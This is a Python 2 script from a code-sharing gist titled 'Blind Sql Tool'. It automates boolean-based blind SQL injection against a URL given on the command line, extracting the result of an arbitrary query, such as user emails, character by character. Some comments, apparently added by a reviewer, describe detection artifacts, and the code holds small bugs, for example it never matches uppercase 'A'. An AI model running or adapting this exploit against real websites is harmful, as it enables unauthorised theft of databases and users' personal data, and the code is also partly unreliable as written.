@AngelGzS
Created May 26, 2011 04:02
Blind Sql Tool
# -*- coding: iso-8859-1 -*-
import re
import urllib
import urllib2
import sys
import cookielib
from socket import ssl
import os
# Module-level setup: everything here runs at script start, and the probe
# helpers defined below read these names as globals.
ua = "Mozilla/5.0 (compatible; Konqueror/3.5.8; Linux)"
# NOTE: `h` (and `ua`) are built but never attached to the opener or to any
# request in this file, so outgoing requests carry urllib2's default
# User-Agent rather than this string.
h = {"User-Agent" : ua}
# Usage banner (Spanish).  Positional arguments: the URL (already carrying
# the parameter, see the example), the SQL query, and the marker text that
# appears in the page only when the injected condition is true.
usage = "\n\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n"
usage += "usage: %s \"url\" \"consulta sql\" \n" % sys.argv[0]
usage += "ejemplo: %s \"wwww.dominio.com/archvio.php?c=1\" \"SELECT email FROM usuarios limit 1,1\" \"Texto verdadero\" \n" % sys.argv[0]
usage += "\n\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n"
if len(sys.argv) < 4:
    print usage
    exit()
# HTTPS handler plus cookie handling.  HTTPCookieProcessor is passed twice
# (cookie_h and a second fresh instance), so two cookie jars end up in the
# handler chain.
hsh = urllib2.HTTPSHandler()
cookie_h = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookie_h,hsh,urllib2.HTTPCookieProcessor())
urllib2.install_opener(opener)
url = sys.argv[1]
param = sys.argv[2]
# Only spaces are percent-encoded; every other character of the query is
# appended to the URL verbatim by the probe helpers.
sql = param.replace(" ", "%20")
# Substring the response body must contain for a probe to count as "true".
cierto = sys.argv[3]
def mayor():
    """Probe whether ascii(character x of the query result) > y.

    Reads the module globals opener, url, sql, x, y and cierto.  Returns 1
    when the response body contains `cierto`; otherwise falls off the end
    and returns None.  Not called from the main loop in this file.  Every
    request built here carries the literal `%20and%20ascii(substring((`
    fragment in the query string, which is the artifact a web log review
    or WAF rule would match on.
    """
    request = opener.open(url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))>"+str(y)+"")
    if request.read().find(cierto) != -1:
        return 1
def menor():
    """Probe whether ascii(character x of the query result) < y.

    Mirror of mayor() with the comparison reversed.  Reads the module
    globals opener, url, sql, x, y and cierto; returns 1 when the response
    body contains `cierto`, else None.  Not called from the main loop in
    this file.
    """
    request = opener.open(url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))<"+str(y)+"")
    if request.read().find(cierto) != -1:
        return 1
def salida():
    """Probe whether ascii(character x of the query result) == 0.

    Intended as an end-of-string check (salida = "exit").  Reads the module
    globals opener, url, sql, x and cierto.  Note the return value is 0 on
    a match and None otherwise, so both outcomes are falsy to a caller.
    Not called from the main loop in this file.
    """
    request = opener.open(url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))=0")
    if request.read().find(cierto) != -1:
        return 0
def acierto():
    """Probe whether ascii(character x of the query result) == y.

    Reads the module globals opener, url, sql, x, y and cierto; returns 1
    when the response body contains `cierto`, else None.  The main loop
    below inlines this same equality probe instead of calling this helper.
    """
    request = opener.open(url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))="+str(y)+"")
    if request.read().find(cierto) != -1:
        return 1
def numero():
    """Probe whether character x of the query result is a digit.

    Sends one request testing ascii value in 48..57 (ASCII '0'..'9').
    Reads the module globals opener, url, sql, x and cierto; returns 1
    when the response body contains `cierto`, else None.  The probe
    contains two conditions joined by `%20and%20%20` (note the doubled
    `%20`), a stable quirk that distinguishes these requests in logs.
    """
    sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))>=48%20and%20%20ascii(substring(("+sql+"),"+str(x)+",1))<=57"
    #print sqlz
    request = opener.open(sqlz)
    if request.read().find(cierto) != -1:
        return 1
def letrama():
    """Probe whether character x of the query result is an uppercase letter.

    Sends one request testing ascii value in 65..90 (ASCII 'A'..'Z').
    Reads the module globals opener, url, sql, x and cierto; returns 1
    when the response body contains `cierto`, else None.
    """
    sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))>=65%20and%20%20ascii(substring(("+sql+"),"+str(x)+",1))<=90"
    request = opener.open(sqlz)
    if request.read().find(cierto) != -1:
        return 1
def letrami():
    """Probe whether character x of the query result is a lowercase letter.

    Sends one request testing ascii value in 97..122 (ASCII 'a'..'z').
    Reads the module globals opener, url, sql, x and cierto; returns 1
    when the response body contains `cierto`, else None.
    """
    sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))>=97%20and%20%20ascii(substring(("+sql+"),"+str(x)+",1))<=122"
    request = opener.open(sqlz)
    if request.read().find(cierto) != -1:
        return 1
# Main loop.  x is the 1-based substring() position, y the candidate ascii
# value, strx the characters recovered so far.
# NOTE(review): the gist rendering lost all indentation; the nesting below
# is reconstructed from the control-flow keywords and the break statements.
x=0
y=0
strx=""
try:
    x=0
    # At most 50 positions are examined.  Each position costs one length
    # probe, up to three class probes and up to 27 equality probes -- a
    # burst of near-identical GETs to the same URL that differ only in the
    # trailing numbers, which is what rate-based detection would key on.
    for i in range(50):
        x=x+1
        # Stop once the result is shorter than x characters.
        sqlz = url+"%20and%20length(("+sql+"))<" + str(x)
        request = opener.open(sqlz)
        # Clears the terminal through the shell with a fixed command string.
        os.system('clear')
        print "caracteres encontrados: "+strx
        if request.read().find(cierto) != -1:
            #print "wtf yaaa"
            break
        # The character class is decided first (lowercase, digit, uppercase);
        # the exact value is then found by linear equality probes within that
        # class.  A character outside all three classes is skipped and
        # nothing is appended to strx for that position.
        if letrami():
            #print "es letra minuscula"
            y=96
            for i in range(27):
                y=y+1
                sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))=" + str(y)
                request = opener.open(sqlz)
                if request.read().find(cierto) != -1:
                    #print "yeee caracter encontrado = " + chr(y)
                    strx=strx+chr(y)
                    break
        elif numero():
            #print "es numero"
            y=47
            for i in range(10):
                y=y+1
                sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))=" + str(y)
                request = opener.open(sqlz)
                if request.read().find(cierto) != -1:
                    #print "yeee caracter encontrado = " + chr(y)
                    strx=strx+chr(y)
                    break
        elif letrama():
            #print "es letra mayuscula"
            y=65
            for i in range(27):
                y=y+1
                sqlz = url+"%20and%20ascii(substring(("+sql+"),"+str(x)+",1))=" + str(y)
                request = opener.open(sqlz)
                if request.read().find(cierto) != -1:
                    #print "yeee caracter encontrado = " + chr(y)
                    strx=strx+chr(y)
                    break
except KeyboardInterrupt:
    # Ctrl-C: "Cierro" = closing; the partial result is reported below.
    print "\n Cierro"
# NOTE(review): with indentation lost it is unclear whether this final
# report belongs inside the except handler; placed at top level here.
print "caracteres encontrados: " + strx